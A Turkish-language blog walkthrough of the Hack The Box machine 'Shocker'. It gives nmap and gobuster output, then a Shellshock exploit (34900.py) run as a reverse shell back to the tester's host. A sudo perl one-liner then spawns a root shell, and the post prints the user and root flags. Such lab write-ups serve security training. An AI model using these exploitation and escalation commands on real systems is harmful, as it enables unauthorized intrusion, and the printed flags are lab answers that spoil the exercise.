İçeriğe geç

Shocker

Makine Adı Seviye OS Logo
Shocker - HTB Kolay Linux

Walkthrough

nmap taraması ile başlayalım.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners: 
|   cpe:/a:apache:http_server:2.4.18: 
|       CVE-2021-26691  7.5 https://vulners.com/cve/CVE-2021-26691
|       CVE-2017-7679   7.5 https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5 https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5 https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5 https://vulners.com/cve/CVE-2017-3167
|       MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/  *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/  7.2 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/   *EXPLOIT*
|       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    *EXPLOIT*
|       CVE-2019-0211   7.2 https://vulners.com/cve/CVE-2019-0211
|       1337DAY-ID-32502    7.2 https://vulners.com/zdt/1337DAY-ID-32502    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2017-15715/  6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/   *EXPLOIT*
|       MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/    6.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/  6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/   *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/  *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/  6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/  6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/   6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/    *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/    6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ *EXPLOIT*
|       MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/  *EXPLOIT*
|       MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/  *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/  6.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/   *EXPLOIT*
|       EDB-ID:47689    5.8 https://vulners.com/exploitdb/EDB-ID:47689  *EXPLOIT*
|       1337DAY-ID-33577    5.8 https://vulners.com/zdt/1337DAY-ID-33577    *EXPLOIT*
|       SSV:96537   5.0 https://vulners.com/seebug/SSV:96537    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2018-1333/   5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2018-1303/   5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2017-15710/  5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/   *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/   5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/    *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/  5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/   *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/  *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/  5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/  5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/  5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/   *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/    5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED  5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED   *EXPLOIT*
|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    *EXPLOIT*
|       EXPLOITPACK:2666FB0676B4B582D689921651A30355    5.0 https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355    *EXPLOIT*
|       EDB-ID:40909    5.0 https://vulners.com/exploitdb/EDB-ID:40909  *EXPLOIT*
|       1337DAY-ID-28573    5.0 https://vulners.com/zdt/1337DAY-ID-28573    *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/   4.9 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2018-1302/   4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2018-1301/   4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/   4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/    *EXPLOIT*
|       MSF:ILITIES/DEBIAN-CVE-2019-10092/  4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/   *EXPLOIT*
|       MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/    4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/ *EXPLOIT*
|       MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/    4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ *EXPLOIT*
|       EDB-ID:47688    4.3 https://vulners.com/exploitdb/EDB-ID:47688  *EXPLOIT*
|       1337DAY-ID-33575    4.3 https://vulners.com/zdt/1337DAY-ID-33575    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2018-1283/   3.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/    *EXPLOIT*
|       MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/  *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/   3.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/    *EXPLOIT*
|       MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/  3.5 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/   3.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/    *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/  *EXPLOIT*
|       PACKETSTORM:152441  0.0 https://vulners.com/packetstorm/PACKETSTORM:152441  *EXPLOIT*
|       EDB-ID:46676    0.0 https://vulners.com/exploitdb/EDB-ID:46676  *EXPLOIT*
|       EDB-ID:42745    0.0 https://vulners.com/exploitdb/EDB-ID:42745  *EXPLOIT*
|       1337DAY-ID-663  0.0 https://vulners.com/zdt/1337DAY-ID-663  *EXPLOIT*
|       1337DAY-ID-601  0.0 https://vulners.com/zdt/1337DAY-ID-601  *EXPLOIT*
|       1337DAY-ID-4533 0.0 https://vulners.com/zdt/1337DAY-ID-4533 *EXPLOIT*
|       1337DAY-ID-3109 0.0 https://vulners.com/zdt/1337DAY-ID-3109 *EXPLOIT*
|_      1337DAY-ID-2237 0.0 https://vulners.com/zdt/1337DAY-ID-2237 *EXPLOIT*
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.2p2: 
|       EDB-ID:21018    10.0    https://vulners.com/exploitdb/EDB-ID:21018  *EXPLOIT*
|       CVE-2001-0554   10.0    https://vulners.com/cve/CVE-2001-0554
|       PACKETSTORM:140070  7.8 https://vulners.com/packetstorm/PACKETSTORM:140070  *EXPLOIT*
|       EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09    7.8 https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09    *EXPLOIT*
|       EDB-ID:40888    7.8 https://vulners.com/exploitdb/EDB-ID:40888  *EXPLOIT*
|       CVE-2016-8858   7.8 https://vulners.com/cve/CVE-2016-8858
|       CVE-2016-6515   7.8 https://vulners.com/cve/CVE-2016-6515
|       1337DAY-ID-26494    7.8 https://vulners.com/zdt/1337DAY-ID-26494    *EXPLOIT*
|       SSV:92579   7.5 https://vulners.com/seebug/SSV:92579    *EXPLOIT*
|       CVE-2016-10009  7.5 https://vulners.com/cve/CVE-2016-10009
|       1337DAY-ID-26576    7.5 https://vulners.com/zdt/1337DAY-ID-26576    *EXPLOIT*
|       SSV:92582   7.2 https://vulners.com/seebug/SSV:92582    *EXPLOIT*
|       CVE-2016-10012  7.2 https://vulners.com/cve/CVE-2016-10012
|       CVE-2015-8325   7.2 https://vulners.com/cve/CVE-2015-8325
|       SSV:92580   6.9 https://vulners.com/seebug/SSV:92580    *EXPLOIT*
|       1337DAY-ID-26577    6.9 https://vulners.com/zdt/1337DAY-ID-26577    *EXPLOIT*
|       MSF:ILITIES/UBUNTU-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/  *EXPLOIT*
|       MSF:ILITIES/SUSE-CVE-2019-25017/    5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/ *EXPLOIT*
|       MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/  *EXPLOIT*
|       MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/  *EXPLOIT*
|       MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/  5.8 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/   *EXPLOIT*
|       MSF:ILITIES/IBM-AIX-CVE-2019-6111/  5.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/  *EXPLOIT*
|       MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/    5.8 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ *EXPLOIT*
|       MSF:ILITIES/DEBIAN-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/  *EXPLOIT*
|       MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/  *EXPLOIT*
|       MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/   5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/    *EXPLOIT*
|       MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/  *EXPLOIT*
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19    *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    *EXPLOIT*
|       EDB-ID:46516    5.8 https://vulners.com/exploitdb/EDB-ID:46516  *EXPLOIT*
|       SSV:91041   5.5 https://vulners.com/seebug/SSV:91041    *EXPLOIT*
|       PACKETSTORM:140019  5.5 https://vulners.com/packetstorm/PACKETSTORM:140019  *EXPLOIT*
|       PACKETSTORM:136234  5.5 https://vulners.com/packetstorm/PACKETSTORM:136234  *EXPLOIT*
|       EXPLOITPACK:F92411A645D85F05BDBD274FD222226F    5.5 https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F    *EXPLOIT*
|       EXPLOITPACK:9F2E746846C3C623A27A441281EAD138    5.5 https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138    *EXPLOIT*
|       EXPLOITPACK:1902C998CBF9154396911926B4C3B330    5.5 https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330    *EXPLOIT*
|       EDB-ID:40858    5.5 https://vulners.com/exploitdb/EDB-ID:40858  *EXPLOIT*
|       SSH_ENUM    5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
|       PACKETSTORM:150621  5.0 https://vulners.com/packetstorm/PACKETSTORM:150621  *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS  *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    *EXPLOIT*
|       EDB-ID:45939    5.0 https://vulners.com/exploitdb/EDB-ID:45939  *EXPLOIT*
|       1337DAY-ID-31730    5.0 https://vulners.com/zdt/1337DAY-ID-31730    *EXPLOIT*
|       EDB-ID:45233    4.6 https://vulners.com/exploitdb/EDB-ID:45233  *EXPLOIT*
|       EDB-ID:40963    4.6 https://vulners.com/exploitdb/EDB-ID:40963  *EXPLOIT*
|       EDB-ID:40962    4.6 https://vulners.com/exploitdb/EDB-ID:40962  *EXPLOIT*
|       MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/  *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/   4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/    *EXPLOIT*
|       EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF    4.3 https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF    *EXPLOIT*
|       EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF    4.3 https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF    *EXPLOIT*
|       1337DAY-ID-25440    4.3 https://vulners.com/zdt/1337DAY-ID-25440    *EXPLOIT*
|       1337DAY-ID-25438    4.3 https://vulners.com/zdt/1337DAY-ID-25438    *EXPLOIT*
|       SSV:92581   2.1 https://vulners.com/seebug/SSV:92581    *EXPLOIT*
|       PACKETSTORM:151227  0.0 https://vulners.com/packetstorm/PACKETSTORM:151227  *EXPLOIT*
|       PACKETSTORM:140261  0.0 https://vulners.com/packetstorm/PACKETSTORM:140261  *EXPLOIT*
|       PACKETSTORM:138006  0.0 https://vulners.com/packetstorm/PACKETSTORM:138006  *EXPLOIT*
|       PACKETSTORM:137942  0.0 https://vulners.com/packetstorm/PACKETSTORM:137942  *EXPLOIT*
|       EDB-ID:46193    0.0 https://vulners.com/exploitdb/EDB-ID:46193  *EXPLOIT*
|       EDB-ID:40136    0.0 https://vulners.com/exploitdb/EDB-ID:40136  *EXPLOIT*
|       EDB-ID:40113    0.0 https://vulners.com/exploitdb/EDB-ID:40113  *EXPLOIT*
|       EDB-ID:39569    0.0 https://vulners.com/exploitdb/EDB-ID:39569  *EXPLOIT*
|       1337DAY-ID-32009    0.0 https://vulners.com/zdt/1337DAY-ID-32009    *EXPLOIT*
|       1337DAY-ID-30937    0.0 https://vulners.com/zdt/1337DAY-ID-30937    *EXPLOIT*
|_      1337DAY-ID-10010    0.0 https://vulners.com/zdt/1337DAY-ID-10010    *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Daha sonrasında gobuster çalıştırdım. cgi-bin görünce shellshock ihtimaline karşı oraya da gobuster yaptım.

┌──(root💀kali)-[~/oscp/htb/Shocker]
└─# gobuster dir --url http://10.10.10.56/cgi-bin/ --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions pl,cgi,py,sh --timeout 20s -t 50 -w /usr/share/wordlists/dirb/big.txt --no-error  | tee gobuster12

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              pl,cgi,py,sh
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 20s
===============================================================
2021/08/02 15:02:25 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.56/cgi-bin/.htpasswd/           (Status: 403) [Size: 304]
http://10.10.10.56/cgi-bin/.htaccess/           (Status: 403) [Size: 304]
http://10.10.10.56/cgi-bin/.htpasswd.pl         (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/.htaccess.sh         (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/.htpasswd.cgi        (Status: 403) [Size: 307]
http://10.10.10.56/cgi-bin/.htaccess.pl         (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/.htpasswd.py         (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/.htpasswd.sh         (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/.htaccess.cgi        (Status: 403) [Size: 307]
http://10.10.10.56/cgi-bin/.htaccess.py         (Status: 403) [Size: 306]
http://10.10.10.56/cgi-bin/user.sh              (Status: 200) [Size: 119]

===============================================================
2021/08/02 15:07:03 Finished
===============================================================

Harika! Hadi deneyelim.

┌──(root💀kali)-[~/oscp/htb/Shocker]
└─# searchsploit shellshock apache
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_cgi - 'Shellshock' Remote Command Injection                                                                                                                                                      | linux/remote/34900.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

┌──(root💀kali)-[~/oscp/htb/Shocker]
└─# searchsploit -m linux/remote/34900.py  
  Exploit: Apache mod_cgi - 'Shellshock' Remote Command Injection
      URL: https://www.exploit-db.com/exploits/34900
     Path: /usr/share/exploitdb/exploits/linux/remote/34900.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/oscp/htb/Shocker/34900.py

Exploitin içerisini /cgi-bin/user.sh olacak şekilde düzenledim ve reverse aldım.


┌──(root💀kali)-[~/oscp/htb/Shocker]
└─# python2 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.9 lport=4444
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> whoami
shelly

Bundan sonrası son derece kolaydı.


shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
cd /home
ls
shelly
cd shelly
ls
user.txt
cat user.txt
ea68349c897b2d362588808569326dfe
cd /root
ls
root.txt
cat root.txt
d91210120544099ceb692b547b1d7a15
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir